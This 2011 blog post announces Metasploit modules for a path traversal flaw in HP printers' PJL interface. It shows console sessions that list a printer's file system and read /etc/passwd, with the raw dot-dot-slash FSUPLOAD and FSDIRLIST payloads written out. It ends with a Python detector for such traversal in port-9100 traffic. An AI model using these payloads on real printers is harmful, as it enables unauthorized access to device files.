Sunday, August 7, 2011

[Metasploit] New Modules: hp_printer_pjl_traversal & hp_printer_pjl_cmd

http://www.exploit-db.com/exploits/17635/
http://www.exploit-db.com/exploits/17636/
_____________________________________________________

hp_printer_pjl_traversal:

This module exploits a path traversal issue in possibly all HP network-enabled printer series, especially those that expose the Printer Job Language (PJL) command interface through the default JetDirect port 9100.
With the decade-old dot-dot-slash payloads, the entire printer file system can be accessed or modified.

msf auxiliary(hp_printer_pjl_traversal) > show options

Module options (auxiliary/admin/hp_printer_pjl_traversal):

Name         Current Setting  Required  Description
----         ---------------  --------  -----------
INTERACTIVE  true             no        Enter interactive mode [msfconsole Only]
RHOST        202.138.16.21    yes       The target address
RPATH        /hp              yes       The remote filesystem path to browse or read
RPORT        9100             yes       The target port

msf auxiliary(hp_printer_pjl_traversal) > set RPATH /
RPATH => /
msf auxiliary(hp_printer_pjl_traversal) > run

[*] Entering interactive mode
[*] cd / ...
[+] Server returned the following response:

. TYPE=DIR
.. TYPE=DIR
bin TYPE=DIR
usr TYPE=DIR
etc TYPE=DIR
hpmnt TYPE=DIR
hp TYPE=DIR
lib TYPE=DIR
dev TYPE=DIR
init TYPE=FILE SIZE=9016
.profile TYPE=FILE SIZE=834
tmp TYPE=DIR

[*] Current RPATH: /
[*] -> 'quit' to exit
[*] ->'/' to return to file system root
[*] ->'..' to move up to one directory
[*] ->'!r FILE' to read FILE on current directory

[*] Enter RPATH:
$ > hp
[*] cd /hp ...
[+] Server returned the following response:

. TYPE=DIR
.. TYPE=DIR
app TYPE=DIR
lib TYPE=DIR
bin TYPE=DIR
webServer TYPE=DIR
images TYPE=DIR
DemoPage TYPE=DIR
loc TYPE=DIR
AsianFonts TYPE=DIR
data TYPE=DIR
etc TYPE=DIR
lrt TYPE=DIR

[*] Current RPATH: /hp
[*] -> 'quit' to exit
[*] ->'/' to return to file system root
[*] ->'..' to move up to one directory
[*] ->'!r FILE' to read FILE on current directory

[*] Enter RPATH:
$ > webServer/config
[*] cd /hp/webServer/config ...
[+] Server returned the following response:

. TYPE=DIR
.. TYPE=DIR
soe.xml TYPE=FILE SIZE=23615
version.6 TYPE=FILE SIZE=45

[*] Current RPATH: /hp/webServer/config
[*] -> 'quit' to exit
[*] ->'/' to return to file system root
[*] ->'..' to move up to one directory
[*] ->'!r FILE' to read FILE on current directory

[*] Enter RPATH:
$ > !r version.6
[*] cat /hp/webServer/config/version.6 ...
[+] Server returned the following response:

WebServer directory version.  Do not delete!

[*] Current RPATH: /hp/webServer/config
[*] -> 'quit' to exit
[*] ->'/' to return to file system root
[*] ->'..' to move up to one directory
[*] ->'!r FILE' to read FILE on current directory

[*] Enter RPATH:
$ > /
[*] cd / ...
[+] Server returned the following response:

. TYPE=DIR
.. TYPE=DIR
bin TYPE=DIR
usr TYPE=DIR
etc TYPE=DIR
hpmnt TYPE=DIR
hp TYPE=DIR
lib TYPE=DIR
dev TYPE=DIR
init TYPE=FILE SIZE=9016
.profile TYPE=FILE SIZE=834
tmp TYPE=DIR

[*] Current RPATH: /
[*] -> 'quit' to exit
[*] ->'/' to return to file system root
[*] ->'..' to move up to one directory
[*] ->'!r FILE' to read FILE on current directory

[*] Enter RPATH:
$ > !r etc/passwd
[*] cat /etc/passwd ...
[+] Server returned the following response:

root::0:0::/:/bin/dlsh

[*] Current RPATH: /
[*] -> 'quit' to exit
[*] ->'/' to return to file system root
[*] ->'..' to move up to one directory
[*] ->'!r FILE' to read FILE on current directory

[*] Enter RPATH:
$ > quit
[*] Exited ... Have fun with your Printer!
[*] Auxiliary module execution completed


hp_printer_pjl_cmd:

This module acts as an HP printer PJL (Printer Job Language) query tool that allows you to submit your own PJL commands. Valid PJL commands are required to get a successful response. See the reference section for the PJL reference guides from HP.

msf auxiliary(hp_printer_pjl_cmd) > run

[*] Entering interactive mode ...
[*] Please wait while executing -
[*] FSUPLOAD NAME="0:/../../../etc/passwd" OFFSET=0 SIZE=999
[+] Server returned the following response:

root::0:0::/:/bin/dlsh

[*] Enter PJL Command:
[*] -> 'quit' to exit
$ > fsdirlist name="0:/../../../" entry=1 count=99999999
[*] Please wait while executing -
[*] fsdirlist name="0:/../../../" entry=1 count=99999999
[+] Server returned the following response:

. TYPE=DIR
.. TYPE=DIR
bin TYPE=DIR
usr TYPE=DIR
etc TYPE=DIR
hpmnt TYPE=DIR
hp TYPE=DIR
lib TYPE=DIR
dev TYPE=DIR
init TYPE=FILE SIZE=9016
.profile TYPE=FILE SIZE=834
tmp TYPE=DIR

[*] Enter PJL Command:
[*] -> 'quit' to exit
$ > quit
[*] Exited ... Have fun with your Printer!
[*] Auxiliary module execution completed
msf auxiliary(hp_printer_pjl_cmd) >
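Both sessions above boil down to two PJL file-system commands with a dot-dot-slash NAME (FSUPLOAD to read a file, FSDIRLIST to list a directory), which makes them easy to spot on the wire. The following Python is an added example, not code from either Metasploit module: it parses PJL command lines from a decoded JetDirect (TCP/9100) stream and flags any file-system command whose NAME escapes its volume. The sample stream, the function names, and the command set beyond the two on this page (taken from HP's PJL Technical Reference) are mine.

```python
import posixpath
import re

# PJL file-system commands that take NAME="volume:/path" (HP PJL Technical
# Reference); the sessions above ride on FSUPLOAD (read) and FSDIRLIST (list).
FS_COMMANDS = {"FSAPPEND", "FSDELETE", "FSDIRLIST", "FSDOWNLOAD",
               "FSINIT", "FSMKDIR", "FSQUERY", "FSUPLOAD"}

UEL = "\x1b%-12345X"  # Universal Exit Language prefix often glued to "@PJL"
_LINE = re.compile(r"^\s*(?:@PJL\s+)?(?P<cmd>[A-Za-z]+)\s*(?P<args>.*)$")
_ARG = re.compile(r'(?P<key>[A-Za-z]+)\s*=\s*(?:"(?P<quoted>[^"]*)"|(?P<bare>\S+))')

def parse_pjl(line):
    """Split one PJL line into (COMMAND, {KEY: value}), upper-casing both,
    since the printer above accepted 'fsdirlist name=' and 'FSUPLOAD NAME='."""
    m = _LINE.match(line.replace(UEL, ""))
    if not m:
        return None, {}
    args = {}
    for a in _ARG.finditer(m.group("args")):
        q = a.group("quoted")
        args[a.group("key").upper()] = q if q is not None else a.group("bare")
    return m.group("cmd").upper(), args

def escapes_volume(name):
    """True when a NAME such as '0:/../../../etc/passwd' climbs above its
    volume root: drop the '0:' prefix, normalise, check whether '..' survives."""
    _, _, path = name.rpartition(":")
    norm = posixpath.normpath(path.lstrip("/")) if path.strip("/") else "."
    return norm == ".." or norm.startswith("../")

def find_traversal(lines):
    """Return (line_no, COMMAND, NAME) for each file-system command in a
    decoded port-9100 stream whose NAME leaves its volume."""
    hits = []
    for n, line in enumerate(lines, 1):
        cmd, args = parse_pjl(line)
        if cmd in FS_COMMANDS and "NAME" in args and escapes_volume(args["NAME"]):
            hits.append((n, cmd, args["NAME"]))
    return hits

# Constructed sample stream: benign job lines around the page's two traversal commands.
SAMPLE_STREAM = [
    "@PJL INFO ID",
    '@PJL FSDIRLIST NAME="0:/webServer/config" ENTRY=1 COUNT=99',
    '@PJL FSUPLOAD NAME="0:/../../../etc/passwd" OFFSET=0 SIZE=999',
    'fsdirlist name="0:/../../../" entry=1 count=99999999',
    "@PJL SET COPIES=1",
]
```

A NAME that stays inside its volume after normalisation (for example `0:/hp/../etc`) is not reported, so the check keys on leaving the volume rather than on the mere presence of `..`.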